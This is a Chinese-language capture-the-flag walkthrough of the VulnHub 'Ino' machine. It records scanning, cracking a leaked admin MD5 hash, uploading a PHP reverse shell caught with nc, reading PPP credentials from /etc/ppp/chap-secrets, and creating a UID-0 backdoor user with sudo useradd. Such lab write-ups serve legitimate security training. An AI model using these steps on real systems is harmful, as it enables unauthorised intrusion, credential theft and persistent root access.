Vulnhub之Ino靶机详细解题过程
Ino
作者: jason_huawen
靶机基本信息
名称:INO: 1.0.1
地址:
https://www.vulnhub.com/entry/ino-101,601/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.77.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:12:e3:78 1 60 PCS Systemtechnik GmbH
192.168.56.219 08:00:27:a7:0f:c9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.218
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 09:55 EST
Nmap scan report for localhost (192.168.56.218)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A7:0F:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.219/lot/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.219
+ Target Hostname: 192.168.56.219
+ Target Port: 80
+ Start Time: 2022-11-25 02:11:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 19 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-25 02:12:10 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 02:12:31 Starting gobuster in directory enumeration mode
===============================================================
/lot (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status (Status: 403) [Size: 279]
Progress: 217184 / 220561 (98.47%)===============================================================
2022/11/25 02:12:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2022/11/25 02:13:13 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.219/: Get "http://192.168.56.219/": dial tcp 192.168.56.219:80: connect: connection refused
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/25 02:13:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1] [--> /lot/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/lot (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status (Status: 403) [Size: 279]
Progress: 1100246 / 1102805 (99.77%)===============================================================
2022/11/25 02:15:56 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/lot
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/25 02:16:19 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 17722]
/about.php (Status: 200) [Size: 679]
/home.php (Status: 200) [Size: 5188]
/header.php (Status: 200) [Size: 1894]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.219/lot/admin/]
/assets (Status: 301) [Size: 321] [--> http://192.168.56.219/lot/assets/]
/footer.php (Status: 200) [Size: 4393]
/css (Status: 301) [Size: 318] [--> http://192.168.56.219/lot/css/]
/database (Status: 301) [Size: 323] [--> http://192.168.56.219/lot/database/]
/js (Status: 301) [Size: 317] [--> http://192.168.56.219/lot/js/]
/head.php (Status: 200) [Size: 0]
/reserve.php (Status: 200) [Size: 2518]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1101943 / 1102805 (99.92%)===============================================================
2022/11/25 02:18:57 Finished
===============================================================
经过一番目录文件扫描后,发现了一个目录/database,在该目录下有文件:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ curl http://192.168.56.219/lot/database/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /lot/database</title>
</head>
<body>
<h1>Index of /lot/database</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/lot/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="lot_db.sql">lot_db.sql</a></td><td align="right">2020-10-20 09:59 </td><td align="right"> 12K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.219 Port 80</address>
</body></html>
将数据库文件lot_db.sql下载到Kali Linux本地,查看发现有用户名和密码:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ mv ~/Downloads/lot_db.sql .
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat lot_db.sql
-- phpMyAdmin SQL Dump
-- version 5.0.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Oct 20, 2020 at 03:59 AM
-- Server version: 10.4.14-MariaDB
-- PHP Version: 7.2.33
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `lot_db`
--
-- --------------------------------------------------------
--
-- Table structure for table `division`
--
CREATE TABLE `division` (
`id` int(30) NOT NULL,
`name` varchar(100) NOT NULL,
`description` text NOT NULL,
`map_img` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `division`
--
INSERT INTO `division` (`id`, `name`, `description`, `map_img`) VALUES
(3, 'Phase 1', 'Sample', '1603089660_devSitePlansTileMobile02.jpg'),
(4, 'Phase 2 ', 'Sample only', '1603089960_devSitePlansTileMobile01.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `lots`
--
CREATE TABLE `lots` (
`id` int(30) NOT NULL,
`division_id` int(30) NOT NULL,
`marker_position` text NOT NULL,
`model_id` int(30) NOT NULL,
`lot` text NOT NULL,
`type` tinyint(1) NOT NULL DEFAULT 1 COMMENT '1=lot ,2= house and lot',
`details` text NOT NULL,
`price` float NOT NULL,
`status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=unavailable,1=available,2 = reserve'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `lots`
--
INSERT INTO `lots` (`id`, `division_id`, `marker_position`, `model_id`, `lot`, `type`, `details`, `price`, `status`) VALUES
(2, 3, '{\"top\":\"200px\",\"left\":\"233px\"}', 1, 'Lot 1 Block 1', 2, '<b>Area: 6400 sq. ft.</b><p><ul><li><b>sample</b></li><li><b>sample</b></li><li><b>sample</b></li><li><b>sample</b></li></ul><p><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis.</span><b></p></p>', 15000, 0),
(3, 4, '{\"top\":\"148px\",\"left\":\"248px\"}', 0, 'Lot 2 Block 1', 1, 'Sample only', 500000, 1),
(4, 4, '{\"top\":\"85px\",\"left\":\"363px\"}', 1, 'Lot 23 Block 6', 2, '<ul><li>Sample</li><li>Sample</li><li>sample</li><li>Test</li></ul><p><b style="margin: 0px; padding: 0px; color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#x2019;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p>', 2300000, 1);
-- --------------------------------------------------------
--
-- Table structure for table `model_houses`
--
CREATE TABLE `model_houses` (
`id` int(30) NOT NULL,
`title` varchar(250) NOT NULL,
`description` text NOT NULL,
`cover` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `model_houses`
--
INSERT INTO `model_houses` (`id`, `title`, `description`, `cover`) VALUES
(1, 'Two-Story House', '<b>Area:150 sq. m.</b><p><ul><li>3 Bed Rooms</li><li>1 Comfort Room each Floor</li><li>Kitchen Area</li><li>Dining Area</li><li>Sample</li><li>Sample</li></ul></p>', '1603095120_images.jpg'),
(2, 'Sample Model House', '<span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis. Nam nibh leo, sollicitudin eget massa ut, consectetur pellentesque nulla. Curabitur quis mi faucibus, interdum elit sed, auctor ex. Aenean elementum ac lorem ut feugiat. Praesent varius, tortor consectetur varius iaculis, erat sem malesuada velit, in lobortis dolor nibh mollis lectus. Etiam elementum sodales ultricies. Donec non odio non urna laoreet malesuada. Donec tincidunt, purus id condimentum dapibus, tortor risus venenatis leo, in molestie lorem ante ut dui. Mauris pulvinar augue nisl, ut commodo leo blandit tristique. In hac habitasse platea dictumst. Nunc semper, nisi ac aliquet lacinia, eros massa dapibus lacus, eu interdum turpis mi vitae nisi.</span><p><ul><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li></ul></p>', '1603095180_images.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `reserved`
--
CREATE TABLE `reserved` (
`id` int(30) NOT NULL,
`lot_id` int(30) NOT NULL,
`firstname` varchar(100) NOT NULL,
`middlename` varchar(100) NOT NULL,
`lastname` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`contact` varchar(100) NOT NULL,
`address` text NOT NULL,
`message` text NOT NULL,
`status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=declined/backed out,1= reserved,2=confimed',
`date_created` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `reserved`
--
INSERT INTO `reserved` (`id`, `lot_id`, `firstname`, `middlename`, `lastname`, `email`, `contact`, `address`, `message`, `status`, `date_created`) VALUES
(2, 2, 'Jsmith', 'C', 'Smith', 'jsmith@sample.com', '0123456548', 'Sample', 'Sample only', 2, '2020-10-20 09:12:10');
-- --------------------------------------------------------
--
-- Table structure for table `system_settings`
--
CREATE TABLE `system_settings` (
`id` int(30) NOT NULL,
`name` text NOT NULL,
`email` varchar(200) NOT NULL,
`contact` varchar(20) NOT NULL,
`cover_img` text NOT NULL,
`about_content` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `system_settings`
--
INSERT INTO `system_settings` (`id`, `name`, `email`, `contact`, `cover_img`, `about_content`) VALUES
(1, 'Lot Reservation Management System', 'info@sample.comm', '+6948 8542 623', '1603096200_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg', '<p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p>');
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(30) NOT NULL,
`name` text NOT NULL,
`username` varchar(200) NOT NULL,
`password` text NOT NULL,
`type` tinyint(1) NOT NULL DEFAULT 3 COMMENT '1=Admin,2=Staff, 3= subscriber'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `name`, `username`, `password`, `type`) VALUES
(1, 'Administrator', 'admin', '0192023a7bbd73250516f069df18b500', 1);
--
-- Indexes for dumped tables
--
--
-- Indexes for table `division`
--
ALTER TABLE `division`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `lots`
--
ALTER TABLE `lots`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `model_houses`
--
ALTER TABLE `model_houses`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `reserved`
--
ALTER TABLE `reserved`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `division`
--
ALTER TABLE `division`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `lots`
--
ALTER TABLE `lots`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `model_houses`
--
ALTER TABLE `model_houses`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `reserved`
--
ALTER TABLE `reserved`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `system_settings`
--
ALTER TABLE `system_settings`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$
在该文件中有用户名admin, 以及加密后的密码:0192023a7bbd73250516f069df18b500
用hash-identifier工具识别一下该加密算法:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0192023a7bbd73250516f069df18b500
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: ^C
Bye!
识别出加密算法为MD5后,用在线的MD5解密网站解密:
https://www.cmd5.com/
得到密码为admin123
而在目录扫描时,我们已经发现了/admin入口,利用用户名和密码登录:
接下来设法找到php shell文件的上传入口。
Division List找到一个可以上传文件的入口,没有报错,再看一下如何访问shell.php
只要点击 view,即可成功得到反弹回来的shell
──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 37322
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
07:29:55 up 3:08, 0 users, load average: 0.00, 0.74, 1.50
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$
www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 10 2020 .
drwxr-xr-x 18 root root 4.0K Oct 27 2020 ..
drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 .
drwxr-xr-x 3 root root 4.0K Oct 10 2020 ..
lrwxrwxrwx 1 root root 9 Dec 5 2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp ppp 220 Oct 10 2020 .bash_logout
-rw-r--r-- 1 ppp ppp 3.5K Oct 10 2020 .bashrc
-rw-r--r-- 1 ppp ppp 807 Oct 10 2020 .profile
-rw-r--r-- 1 ppp ppp 33 Dec 5 2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a
www-data@ino:/home/ppp$
得到了用户flag
提权
搜寻了一番,找到了数据库连接文件:
www-data@ino:/var/www/html/lot/admin$ cat db_connect.php
cat db_connect.php
<?php
$conn= new mysqli('localhost','lot','lot','lot_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@ino:/var/www/html/lot/admin$ mysql -ulot -p
mysql -ulot -p
Enter password: lot
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 179
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
成功登录数据库,但是没找到方法通过数据库提权,事实上PPP是一种服务,再找相关的文件:
www-data@ino:/var/www/html/lot/admin$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -alh
ls -alh
total 68K
drwxr-xr-x 7 root dip 4.0K Oct 26 2020 .
drwxr-xr-x 94 root root 4.0K Dec 6 2020 ..
-rw-r--r-- 1 root root 101 Oct 26 2020 chap-secrets
-rwxr-xr-x 1 root root 1.8K Feb 20 2020 ip-down
drwxr-xr-x 2 root root 4.0K Oct 26 2020 ip-down.d
-rwxr-xr-x 1 root root 1.9K Feb 20 2020 ip-up
drwxr-xr-x 2 root root 4.0K Oct 26 2020 ip-up.d
-rwxr-xr-x 1 root root 784 Feb 20 2020 ipv6-down
drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-down.d
-rwxr-xr-x 1 root root 922 Feb 20 2020 ipv6-up
drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-up.d
-rw-r--r-- 1 root root 13K Feb 20 2020 options
-rw------- 1 root root 1.6K Oct 26 2020 pap-secrets
drwxr-s--- 2 root dip 4.0K Oct 26 2020 peers
www-data@ino:/etc/ppp$ cat chap-secrets
cat chap-secrets
# Secrets for authentication using CHAP
# client server secret IP addresses
ppp * ESRxd7856HVJB *
看到了ppp用户的密码,切换到ppp用户,然后利用useradd命令创建超级用户:
ppp@ino:~$ sudo useradd -p `openssl passwd 123456` hacker -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
< -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
ppp@ino:~$ su - hacker
su - hacker
Password: 123456
su: warning: cannot change directory to /home/hacker: No such file or directory
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
#
成功提权!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
